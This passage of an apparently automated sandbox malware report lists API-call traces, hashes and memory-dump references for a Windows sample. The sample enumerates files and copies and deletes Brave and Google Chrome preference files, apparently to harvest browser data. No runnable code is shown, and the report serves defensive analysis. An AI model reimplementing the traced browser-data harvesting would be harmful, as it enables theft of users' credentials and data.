                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: fa2cb3584bebfa68d7b7583465c84bf8b45e8f57088ab5bb08c372fecd5bb176
                                • Instruction ID: c5352d4be7e8945ed83518b11afe5a465b8d68314cc551cfb05231b136f4f1e9
                                • Opcode Fuzzy Hash: fa2cb3584bebfa68d7b7583465c84bf8b45e8f57088ab5bb08c372fecd5bb176
                                • Instruction Fuzzy Hash: 63F0A5B1008709CBD7013F6888486ADBBE4FF15721F121A5DD9D192650E67258A0CB8B
                                APIs
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C823D4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C823F7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C82402
                                • lstrlen.KERNEL32(\*.*), ref: 00C8240D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8242A
                                • lstrcat.KERNEL32(00000000,\*.*), ref: 00C82436
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8246A
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 00C82486
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                • String ID: \*.*
                                • API String ID: 2567437900-1173974218
                                • Opcode ID: 2a6568a5a5cba93fd5fded856071aa0e5080ac890e9837bbf2b7601ed029375e
                                • Instruction ID: 01f3680e888fbe850b211f24bc8de5cdab9b7853f6f9b89b2d470b966383371e
                                • Opcode Fuzzy Hash: 2a6568a5a5cba93fd5fded856071aa0e5080ac890e9837bbf2b7601ed029375e
                                • Instruction Fuzzy Hash: 75A28231A012169FCB61BF75DD8CAAE77B8EF49704F098024F819E7252DB34EE059B94
                                APIs
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C716E2
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C71719
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7176C
                                • lstrcat.KERNEL32(00000000), ref: 00C71776
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C717A2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C717EF
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C717F9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C71825
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C71875
                                • lstrcat.KERNEL32(00000000), ref: 00C7187F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C718AB
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C718F3
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C718FE
                                • lstrlen.KERNEL32(00CA1794), ref: 00C71909
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C71929
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C71935
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7195B
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C71966
                                • lstrlen.KERNEL32(\*.*), ref: 00C71971
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7198E
                                • lstrcat.KERNEL32(00000000,\*.*), ref: 00C7199A
                                  • Part of subcall function 00C94040: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 00C9406D
                                  • Part of subcall function 00C94040: lstrcpy.KERNEL32(00000000,?), ref: 00C940A2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C719C3
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C71A0E
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C71A16
                                • lstrlen.KERNEL32(00CA1794), ref: 00C71A21
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C71A41
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C71A4D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C71A76
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C71A81
                                • lstrlen.KERNEL32(00CA1794), ref: 00C71A8C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C71AAC
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C71AB8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C71ADE
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C71AE9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C71B11
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 00C71B45
                                • StrCmpCA.SHLWAPI(?,00CA17A0), ref: 00C71B70
                                • StrCmpCA.SHLWAPI(?,00CA17A4), ref: 00C71B8A
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C71BC4
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C71BFB
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C71C03
                                • lstrlen.KERNEL32(00CA1794), ref: 00C71C0E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C71C31
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C71C3D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C71C69
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C71C74
                                • lstrlen.KERNEL32(00CA1794), ref: 00C71C7F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C71CA2
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C71CAE
                                • lstrlen.KERNEL32(?), ref: 00C71CBB
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C71CDB
                                • lstrcat.KERNEL32(00000000,?), ref: 00C71CE9
                                • lstrlen.KERNEL32(00CA1794), ref: 00C71CF4
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C71D14
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C71D20
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C71D46
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C71D51
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C71D7D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C71DE0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C71DEB
                                • lstrlen.KERNEL32(00CA1794), ref: 00C71DF6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C71E19
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C71E25
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C71E4B
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C71E56
                                • lstrlen.KERNEL32(00CA1794), ref: 00C71E61
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C71E81
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C71E8D
                                • lstrlen.KERNEL32(?), ref: 00C71E9A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C71EBA
                                • lstrcat.KERNEL32(00000000,?), ref: 00C71EC8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C71EF4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C71F3E
                                • GetFileAttributesA.KERNEL32(00000000), ref: 00C71F45
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C71F9F
                                • lstrlen.KERNEL32(01798908), ref: 00C71FAE
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C71FDB
                                • lstrcat.KERNEL32(00000000,?), ref: 00C71FE3
                                • lstrlen.KERNEL32(00CA1794), ref: 00C71FEE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7200E
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C7201A
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C72042
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C7204D
                                • lstrlen.KERNEL32(00CA1794), ref: 00C72058
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C72075
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C72081
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$File$AttributesFindFirstFolderPath
                                • String ID: \*.*
                                • API String ID: 4127656590-1173974218
                                • Opcode ID: ad3f43a7561cd72e4e749873e43d1501db9c4f55c900da8e3397bd9ce41c9d25
                                • Instruction ID: 88328db14f45e93e1156fa1da5d44a21c35f9c8c7f0262d27c0e26c260c24995
                                • Opcode Fuzzy Hash: ad3f43a7561cd72e4e749873e43d1501db9c4f55c900da8e3397bd9ce41c9d25
                                • Instruction Fuzzy Hash: B1928531A112169FCB21AFA9DD88AAF77B9EF45700F098024FD1DA7251DB30EE05DB90
                                APIs
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C7DBC1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7DBE4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C7DBEF
                                • lstrlen.KERNEL32(00CA4CA8), ref: 00C7DBFA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7DC17
                                • lstrcat.KERNEL32(00000000,00CA4CA8), ref: 00C7DC23
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7DC4C
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C7DC8F
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C7DCBF
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 00C7DCD0
                                • StrCmpCA.SHLWAPI(?,00CA17A0), ref: 00C7DCF0
                                • StrCmpCA.SHLWAPI(?,00CA17A4), ref: 00C7DD0A
                                • lstrlen.KERNEL32(00C9CFEC), ref: 00C7DD1D
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C7DD47
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7DD70
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C7DD7B
                                • lstrlen.KERNEL32(00CA1794), ref: 00C7DD86
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7DDA3
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C7DDAF
                                • lstrlen.KERNEL32(?), ref: 00C7DDBC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7DDDF
                                • lstrcat.KERNEL32(00000000,?), ref: 00C7DDED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7DE19
                                • lstrlen.KERNEL32(00CA1794), ref: 00C7DE3D
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C7DE6F
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C7DE7B
                                • lstrlen.KERNEL32(01798AD8), ref: 00C7DE8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7DEB0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C7DEBB
                                • lstrlen.KERNEL32(00CA1794), ref: 00C7DEC6
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C7DEE6
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C7DEF2
                                • lstrlen.KERNEL32(01798A88), ref: 00C7DF01
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7DF27
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C7DF32
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7DF5E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7DFA5
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C7DFB1
                                • lstrlen.KERNEL32(01798AD8), ref: 00C7DFC0
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7DFE9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C7DFF4
                                • lstrlen.KERNEL32(00CA1794), ref: 00C7DFFF
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C7E022
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C7E02E
                                • lstrlen.KERNEL32(01798A88), ref: 00C7E03D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7E063
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C7E06E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7E09A
                                • StrCmpCA.SHLWAPI(?,Brave), ref: 00C7E0CD
                                • StrCmpCA.SHLWAPI(?,Preferences), ref: 00C7E0E7
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C7E11F
                                • lstrlen.KERNEL32(0179D8B0), ref: 00C7E12E
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C7E155
                                • lstrcat.KERNEL32(00000000,?), ref: 00C7E15D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7E19F
                                • lstrcat.KERNEL32(00000000), ref: 00C7E1A9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7E1D0
                                • CopyFileA.KERNEL32(00000000,?,00000001), ref: 00C7E1F9
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C7E22F
                                • lstrlen.KERNEL32(01798908), ref: 00C7E23D
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C7E261
                                • lstrcat.KERNEL32(00000000,01798908), ref: 00C7E269
                                • lstrlen.KERNEL32(\Brave\Preferences), ref: 00C7E274
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7E29B
                                • lstrcat.KERNEL32(00000000,\Brave\Preferences), ref: 00C7E2A7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7E2CF
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C7E30F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7E349
                                • DeleteFileA.KERNEL32(?), ref: 00C7E381
                                • StrCmpCA.SHLWAPI(?,0179D8E0), ref: 00C7E3AB
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C7E3F4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7E41C
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C7E445
                                • StrCmpCA.SHLWAPI(?,01798A88), ref: 00C7E468
                                • StrCmpCA.SHLWAPI(?,01798AD8), ref: 00C7E47D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7E4D9
                                • GetFileAttributesA.KERNEL32(00000000), ref: 00C7E4E0
                                • StrCmpCA.SHLWAPI(?,0179D868), ref: 00C7E58E
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C7E5C4
                                • CopyFileA.KERNEL32(00000000,?,00000001), ref: 00C7E639
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C7E678
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C7E6A1
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C7E6C7
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C7E70E
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C7E737
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C7E75C
                                • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 00C7E776
                                • DeleteFileA.KERNEL32(?), ref: 00C7E7D2
                                • StrCmpCA.SHLWAPI(?,017988F8), ref: 00C7E7FC
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C7E88C
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C7E8B5
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C7E8EE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7E916
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C7E952
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                 • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$File$CopyDelete$AttributesFindFirst
                                • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                • API String ID: 2635522530-726946144
                                • Opcode ID: cfde230435d96214b4a2033edd9d1045102503e9c1b2893992b814e094ba97d3
                                • Instruction ID: edcb76217ef9210c9b1f1fdf88cf01bfdd0bd8feb02ed94a71b0aa757481fa31
                                • Opcode Fuzzy Hash: cfde230435d96214b4a2033edd9d1045102503e9c1b2893992b814e094ba97d3
                                • Instruction Fuzzy Hash: 4A929471A112069FCB60EFB5DC89AAE77B9EF48300F088564F81AE7251DB34ED45DB90
                                APIs
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C818D2
                                • lstrlen.KERNEL32(\*.*), ref: 00C818DD
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C818FF
                                • lstrcat.KERNEL32(00000000,\*.*), ref: 00C8190B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C81932
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 00C81947
                                • StrCmpCA.SHLWAPI(?,00CA17A0), ref: 00C81967
                                • StrCmpCA.SHLWAPI(?,00CA17A4), ref: 00C81981
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C819BF
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C819F2
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C81A1A
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C81A25
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C81A4C
                                • lstrlen.KERNEL32(00CA1794), ref: 00C81A5E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C81A80
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C81A8C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C81AB4
                                • lstrlen.KERNEL32(?), ref: 00C81AC8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C81AE5
                                • lstrcat.KERNEL32(00000000,?), ref: 00C81AF3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C81B19
                                • lstrlen.KERNEL32(01798998), ref: 00C81B2F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C81B59
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C81B64
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C81B8F
                                • lstrlen.KERNEL32(00CA1794), ref: 00C81BA1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C81BC3
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C81BCF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C81BF8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C81C25
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C81C30
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C81C57
                                • lstrlen.KERNEL32(00CA1794), ref: 00C81C69
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C81C8B
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C81C97
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C81CC0
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C81CEF
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C81CFA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C81D21
                                • lstrlen.KERNEL32(00CA1794), ref: 00C81D33
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C81D55
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C81D61
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C81D8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C81DB9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C81DC4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C81DED
                                • lstrlen.KERNEL32(00CA1794), ref: 00C81E19
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C81E36
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C81E42
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C81E68
                                • lstrlen.KERNEL32(0179D838), ref: 00C81E7E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C81EB2
                                • lstrlen.KERNEL32(00CA1794), ref: 00C81EC6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C81EE3
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C81EEF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C81F15
                                • lstrlen.KERNEL32(0179DD70), ref: 00C81F2B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C81F5F
                                • lstrlen.KERNEL32(00CA1794), ref: 00C81F73
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C81F90
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C81F9C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C81FC2
                                • lstrlen.KERNEL32(0178A618), ref: 00C81FD8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C82000
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C8200B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C82036
                                • lstrlen.KERNEL32(00CA1794), ref: 00C82048
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C82067
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C82073
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C82098
                                • lstrlen.KERNEL32(?), ref: 00C820AC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C820D0
                                • lstrcat.KERNEL32(00000000,?), ref: 00C820DE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C82103
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C8213F
                                • lstrlen.KERNEL32(0179D8B0), ref: 00C8214E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C82176
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C82181
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$FileFindFirst
                                • String ID: \*.*
                                • API String ID: 712834838-1173974218
                                • Opcode ID: 923039147c552edad20268ae9035cd24cf196464be1e902cd433ea9dd9c4ed0f
                                • Instruction ID: 46ad5b63c172e5347d51a27a73861309b4d9061e9f30bc58387a7c5493b9a12d
                                • Opcode Fuzzy Hash: 923039147c552edad20268ae9035cd24cf196464be1e902cd433ea9dd9c4ed0f
                                • Instruction Fuzzy Hash: C06282316116169FCB21BF65CC88AAFB7F9EF45704F098024F819A7252DB34EE06DB94
                                APIs
                                • wsprintfA.USER32 ref: 00C8392C
                                • FindFirstFileA.KERNEL32(?,?), ref: 00C83943
                                • StrCmpCA.SHLWAPI(?,00CA17A0), ref: 00C8396C
                                • StrCmpCA.SHLWAPI(?,00CA17A4), ref: 00C83986
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C839BF
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C839E7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C839F2
                                • lstrlen.KERNEL32(00CA1794), ref: 00C839FD
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C83A1A
